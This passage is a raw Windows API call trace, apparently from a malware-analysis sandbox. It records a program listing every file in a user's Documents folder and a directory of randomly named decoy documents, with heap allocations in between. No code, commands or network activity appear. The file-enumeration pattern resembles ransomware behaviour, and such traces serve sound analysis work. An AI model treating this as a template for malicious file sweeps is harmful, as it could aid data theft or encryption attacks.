ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.260] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8926dae0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x8926dae0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x464a6c50, ftCreationTime.dwHighDateTime=0x1d5b602, ftLastAccessTime.dwLowDateTime=0xd87bcdf0, ftLastAccessTime.dwHighDateTime=0x1d5b8a3, ftLastWriteTime.dwLowDateTime=0xd87bcdf0, ftLastWriteTime.dwHighDateTime=0x1d5b8a3, nFileSizeHigh=0x0, nFileSizeLow=0xd6e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0UuOGgFHrUTR7ZhF.mkv", cAlternateFileName="0UUOGG~1.MKV")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a5ca00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x743e6080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x71437000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0xc0c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="243E.TMP.EXE.DEL105265203.DEL105731312.exe", cAlternateFileName="243ETM~1.EXE")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc45fd60, ftCreationTime.dwHighDateTime=0x1d5beda, ftLastAccessTime.dwLowDateTime=0xe3a7c9e0, ftLastAccessTime.dwHighDateTime=0x1d5b989, ftLastWriteTime.dwLowDateTime=0xe3a7c9e0, ftLastWriteTime.dwHighDateTime=0x1d5b989, nFileSizeHigh=0x0, nFileSizeLow=0x3799, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4jwDK-_ApAqP4UABdnk.pps", cAlternateFileName="4JWDK-~1.PPS")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1da51260, ftCreationTime.dwHighDateTime=0x1d5b88b, ftLastAccessTime.dwLowDateTime=0x6d8d4e60, ftLastAccessTime.dwHighDateTime=0x1d5b97f, ftLastWriteTime.dwLowDateTime=0x6d8d4e60, ftLastWriteTime.dwHighDateTime=0x1d5b97f, nFileSizeHigh=0x0, nFileSizeLow=0x30bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4v8BPdIlo-.wav", cAlternateFileName="4V8BPD~1.WAV")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81956bc0, ftCreationTime.dwHighDateTime=0x1d5b93b, ftLastAccessTime.dwLowDateTime=0x6435e690, ftLastAccessTime.dwHighDateTime=0x1d5c048, ftLastWriteTime.dwLowDateTime=0x6435e690, ftLastWriteTime.dwHighDateTime=0x1d5c048, nFileSizeHigh=0x0, nFileSizeLow=0x77ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9 Vm_5e64ZEi3JJc07u7.flv", cAlternateFileName="9VM_5E~1.FLV")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd89a90, ftCreationTime.dwHighDateTime=0x1d5c3d8, ftLastAccessTime.dwLowDateTime=0xe6905a00, ftLastAccessTime.dwHighDateTime=0x1d5c00f, ftLastWriteTime.dwLowDateTime=0xe6905a00, ftLastWriteTime.dwHighDateTime=0x1d5c00f, nFileSizeHigh=0x0, nFileSizeLow=0x146cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B1thbOPkcKcfqX.ppt", cAlternateFileName="B1THBO~1.PPT")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73682a60, ftCreationTime.dwHighDateTime=0x1d5b66b, ftLastAccessTime.dwLowDateTime=0xfa3ff820, ftLastAccessTime.dwHighDateTime=0x1d5bade, ftLastWriteTime.dwLowDateTime=0xfa3ff820, ftLastWriteTime.dwHighDateTime=0x1d5bade, nFileSizeHigh=0x0, nFileSizeLow=0x9998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BC_f1u.ods", cAlternateFileName="")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9b70350, ftCreationTime.dwHighDateTime=0x1d5b7fd, ftLastAccessTime.dwLowDateTime=0x1a6fa990, ftLastAccessTime.dwHighDateTime=0x1d5b88e, ftLastWriteTime.dwLowDateTime=0x1a6fa990, ftLastWriteTime.dwHighDateTime=0x1d5b88e, nFileSizeHigh=0x0, nFileSizeLow=0x17ee0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dSzm6_6rQ5oFPRjOyx.docx", cAlternateFileName="DSZM6_~1.DOC")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18a08fd0, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x2fe047d0, ftLastAccessTime.dwHighDateTime=0x1d5b91f, ftLastWriteTime.dwLowDateTime=0x2fe047d0, ftLastWriteTime.dwHighDateTime=0x1d5b91f, nFileSizeHigh=0x0, nFileSizeLow=0xa4e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gNI2 7WqYz3wxiIDKTyj.m4a", cAlternateFileName="GNI27W~1.M4A")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52538370, ftCreationTime.dwHighDateTime=0x1d5bddb, ftLastAccessTime.dwLowDateTime=0x98dce850, ftLastAccessTime.dwHighDateTime=0x1d5bbfa, ftLastWriteTime.dwLowDateTime=0x98dce850, ftLastWriteTime.dwHighDateTime=0x1d5bbfa, nFileSizeHigh=0x0, nFileSizeLow=0x141b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h7MYO.xlsx", cAlternateFileName="H7MYO~1.XLS")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5ed0c20, ftCreationTime.dwHighDateTime=0x1d5bb1b, ftLastAccessTime.dwLowDateTime=0xb55f320, ftLastAccessTime.dwHighDateTime=0x1d5b9e1, ftLastWriteTime.dwLowDateTime=0xb55f320, ftLastWriteTime.dwHighDateTime=0x1d5b9e1, nFileSizeHigh=0x0, nFileSizeLow=0xb92f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hCF6SL6FoYE73x.mp4", cAlternateFileName="HCF6SL~1.MP4")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fb7e900, ftCreationTime.dwHighDateTime=0x1d5bc85, ftLastAccessTime.dwLowDateTime=0xa96cc610, ftLastAccessTime.dwHighDateTime=0x1d5c120, ftLastWriteTime.dwLowDateTime=0xa96cc610, ftLastWriteTime.dwHighDateTime=0x1d5c120, nFileSizeHigh=0x0, nFileSizeLow=0x15f46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="he-u.swf", cAlternateFileName="")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bac6050, ftCreationTime.dwHighDateTime=0x1d5b981, ftLastAccessTime.dwLowDateTime=0xc9c32bf0, ftLastAccessTime.dwHighDateTime=0x1d5c249, ftLastWriteTime.dwLowDateTime=0xc9c32bf0, ftLastWriteTime.dwHighDateTime=0x1d5c249, nFileSizeHigh=0x0, nFileSizeLow=0x40c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J6bjq9K.xls", cAlternateFileName="")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18c40080, ftCreationTime.dwHighDateTime=0x1d5b8fe, ftLastAccessTime.dwLowDateTime=0x451aeb30, ftLastAccessTime.dwHighDateTime=0x1d5bb1f, ftLastWriteTime.dwLowDateTime=0x451aeb30, ftLastWriteTime.dwHighDateTime=0x1d5bb1f, nFileSizeHigh=0x0, nFileSizeLow=0x5b63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkjdLnetgwIJnbnmh.ods", cAlternateFileName="JKJDLN~1.ODS")) returned 1 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KMPcG-yOQU21BwvLjWXX", cAlternateFileName="KMPCG-~1")) returned 1 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6931e0 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332da38 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.261] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf53a0610, ftCreationTime.dwHighDateTime=0x1d5bb86, ftLastAccessTime.dwLowDateTime=0x43998df0, ftLastAccessTime.dwHighDateTime=0x1d5ba04, ftLastWriteTime.dwLowDateTime=0x43998df0, ftLastWriteTime.dwHighDateTime=0x1d5ba04, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NcPu25RMbC", cAlternateFileName="NCPU25~1")) returned 1 [0094.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332db28 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce4e0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce1a0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6931e0 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb33e8c50, ftCreationTime.dwHighDateTime=0x1d5b699, ftLastAccessTime.dwLowDateTime=0xc939f200, ftLastAccessTime.dwHighDateTime=0x1d5c239, ftLastWriteTime.dwLowDateTime=0xc939f200, ftLastWriteTime.dwHighDateTime=0x1d5c239, nFileSizeHigh=0x0, nFileSizeLow=0x15370, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ojxdX-of4_PQAXSnC.ods", cAlternateFileName="OJXDX-~1.ODS")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x867a05c0, ftCreationTime.dwHighDateTime=0x1d5becb, ftLastAccessTime.dwLowDateTime=0x9f8dc60, ftLastAccessTime.dwHighDateTime=0x1d5bdcc, ftLastWriteTime.dwLowDateTime=0x9f8dc60, ftLastWriteTime.dwHighDateTime=0x1d5bdcc, nFileSizeHigh=0x0, nFileSizeLow=0x95f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pFReHiaBWQMkp8i.bmp", cAlternateFileName="PFREHI~1.BMP")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcad1a340, ftCreationTime.dwHighDateTime=0x1d5b5a7, ftLastAccessTime.dwLowDateTime=0x859f8c30, ftLastAccessTime.dwHighDateTime=0x1d5c419, ftLastWriteTime.dwLowDateTime=0x859f8c30, ftLastWriteTime.dwHighDateTime=0x1d5c419, nFileSizeHigh=0x0, nFileSizeLow=0x17948, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PQdv.bmp", cAlternateFileName="")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebd89e40, ftCreationTime.dwHighDateTime=0x1d5bb1f, ftLastAccessTime.dwLowDateTime=0x4130c530, ftLastAccessTime.dwHighDateTime=0x1d5c592, ftLastWriteTime.dwLowDateTime=0x4130c530, ftLastWriteTime.dwHighDateTime=0x1d5c592, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pwaY", cAlternateFileName="")) returned 1 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee48d880, ftCreationTime.dwHighDateTime=0x1d5bbaf, ftLastAccessTime.dwLowDateTime=0x22748330, ftLastAccessTime.dwHighDateTime=0x1d5beca, ftLastWriteTime.dwLowDateTime=0x22748330, ftLastWriteTime.dwHighDateTime=0x1d5beca, nFileSizeHigh=0x0, nFileSizeLow=0x15029, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Q0Ki1.odt", cAlternateFileName="")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedb01e90, ftCreationTime.dwHighDateTime=0x1d5bb39, ftLastAccessTime.dwLowDateTime=0xd478d9a0, ftLastAccessTime.dwHighDateTime=0x1d5bc90, ftLastWriteTime.dwLowDateTime=0xd478d9a0, ftLastWriteTime.dwHighDateTime=0x1d5bc90, nFileSizeHigh=0x0, nFileSizeLow=0x18f52, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="urNMQz.bmp", cAlternateFileName="")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf257d860, ftCreationTime.dwHighDateTime=0x1d5b9ff, ftLastAccessTime.dwLowDateTime=0x32ef9040, ftLastAccessTime.dwHighDateTime=0x1d5c47b, ftLastWriteTime.dwLowDateTime=0x32ef9040, ftLastWriteTime.dwHighDateTime=0x1d5c47b, nFileSizeHigh=0x0, nFileSizeLow=0x1482b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="v3m_7Lp.pdf", cAlternateFileName="")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b277f0, ftCreationTime.dwHighDateTime=0x1d5bc4c, ftLastAccessTime.dwLowDateTime=0xf537cd40, ftLastAccessTime.dwHighDateTime=0x1d5c578, ftLastWriteTime.dwLowDateTime=0xf537cd40, ftLastWriteTime.dwHighDateTime=0x1d5c578, nFileSizeHigh=0x0, nFileSizeLow=0xc7aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vmGq grnpAL6-WzZ7.doc", cAlternateFileName="VMGQGR~1.DOC")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ac34c0, ftCreationTime.dwHighDateTime=0x1d5bd01, ftLastAccessTime.dwLowDateTime=0xa216d560, ftLastAccessTime.dwHighDateTime=0x1d5bdea, ftLastWriteTime.dwLowDateTime=0xa216d560, ftLastWriteTime.dwHighDateTime=0x1d5bdea, nFileSizeHigh=0x0, nFileSizeLow=0x16973, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yEaSLdjQoLZPDOJC3jK.bmp", cAlternateFileName="YEASLD~1.BMP")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832ef110, ftCreationTime.dwHighDateTime=0x1d5c14a, ftLastAccessTime.dwLowDateTime=0x4161b80, ftLastAccessTime.dwHighDateTime=0x1d5c32d, ftLastWriteTime.dwLowDateTime=0x4161b80, ftLastWriteTime.dwHighDateTime=0x1d5c32d, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZO d wwM-wRdscY.bmp", cAlternateFileName="ZODWWM~1.BMP")) returned 1 [0094.262] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x832ef110, ftCreationTime.dwHighDateTime=0x1d5c14a, ftLastAccessTime.dwLowDateTime=0x4161b80, ftLastAccessTime.dwHighDateTime=0x1d5c32d, ftLastWriteTime.dwLowDateTime=0x4161b80, ftLastWriteTime.dwHighDateTime=0x1d5c32d, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZO d wwM-wRdscY.bmp", cAlternateFileName="ZODWWM~1.BMP")) returned 0 [0094.262] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.262] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.262] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0094.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.263] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.263] PathFindFileNameW (pszPath="") returned="" [0094.263] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0094.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fd3f350, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fd3f350, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85bf09d0, ftCreationTime.dwHighDateTime=0x1d57111, ftLastAccessTime.dwLowDateTime=0x9ce02d20, ftLastAccessTime.dwHighDateTime=0x1d5bf94, ftLastWriteTime.dwLowDateTime=0x9ce02d20, ftLastWriteTime.dwHighDateTime=0x1d5bf94, nFileSizeHigh=0x0, nFileSizeLow=0xed4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="48Qgvj76f-A.pptx", cAlternateFileName="48QGVJ~1.PPT")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118db3d0, ftCreationTime.dwHighDateTime=0x1d5c310, ftLastAccessTime.dwLowDateTime=0xbf911ec0, ftLastAccessTime.dwHighDateTime=0x1d5ba70, ftLastWriteTime.dwLowDateTime=0xbf911ec0, ftLastWriteTime.dwHighDateTime=0x1d5ba70, nFileSizeHigh=0x0, nFileSizeLow=0x10478, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5dx_mGakYFnEcnVitJ.pptx", cAlternateFileName="5DX_MG~1.PPT")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bb1fb0, ftCreationTime.dwHighDateTime=0x1d5bdb5, ftLastAccessTime.dwLowDateTime=0x805b0be0, ftLastAccessTime.dwHighDateTime=0x1d5b8cb, ftLastWriteTime.dwLowDateTime=0x805b0be0, ftLastWriteTime.dwHighDateTime=0x1d5b8cb, nFileSizeHigh=0x0, nFileSizeLow=0x18abd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5yCEZc_6.csv", cAlternateFileName="")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf40f620, ftCreationTime.dwHighDateTime=0x1d5c50f, ftLastAccessTime.dwLowDateTime=0xf0762ce0, ftLastAccessTime.dwHighDateTime=0x1d5b94b, ftLastWriteTime.dwLowDateTime=0xf0762ce0, ftLastWriteTime.dwHighDateTime=0x1d5b94b, nFileSizeHigh=0x0, nFileSizeLow=0x10700, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6JU8bcP.rtf", cAlternateFileName="")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5025e30, ftCreationTime.dwHighDateTime=0x1d5c0e6, ftLastAccessTime.dwLowDateTime=0x4e339d60, ftLastAccessTime.dwHighDateTime=0x1d5c22d, ftLastWriteTime.dwLowDateTime=0x4e339d60, ftLastWriteTime.dwHighDateTime=0x1d5c22d, nFileSizeHigh=0x0, nFileSizeLow=0x32b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8z1erq5O_sk6.xls", cAlternateFileName="8Z1ERQ~1.XLS")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15309790, ftCreationTime.dwHighDateTime=0x1d5c325, ftLastAccessTime.dwLowDateTime=0xb4953710, ftLastAccessTime.dwHighDateTime=0x1d5c12b, ftLastWriteTime.dwLowDateTime=0xb4953710, ftLastWriteTime.dwHighDateTime=0x1d5c12b, nFileSizeHigh=0x0, nFileSizeLow=0x4ce4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8zV-Lb4_.ppt", cAlternateFileName="")) returned 1 [0094.263] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa4513b0, ftCreationTime.dwHighDateTime=0x1d5c29e, ftLastAccessTime.dwLowDateTime=0x79af8270, ftLastAccessTime.dwHighDateTime=0x1d5ba6b, ftLastWriteTime.dwLowDateTime=0x79af8270, ftLastWriteTime.dwHighDateTime=0x1d5ba6b, nFileSizeHigh=0x0, nFileSizeLow=0x27da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ac56VePDrCIq.pptx", cAlternateFileName="AC56VE~1.PPT")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9079b780, ftCreationTime.dwHighDateTime=0x1d5b82e, ftLastAccessTime.dwLowDateTime=0x9d0c3c20, ftLastAccessTime.dwHighDateTime=0x1d5bbe4, ftLastWriteTime.dwLowDateTime=0x9d0c3c20, ftLastWriteTime.dwHighDateTime=0x1d5bbe4, nFileSizeHigh=0x0, nFileSizeLow=0x139bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AXprvG.ots", cAlternateFileName="")) returned 1 [0094.264] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2908f6c0, ftCreationTime.dwHighDateTime=0x1d5c570, ftLastAccessTime.dwLowDateTime=0x89d90520, 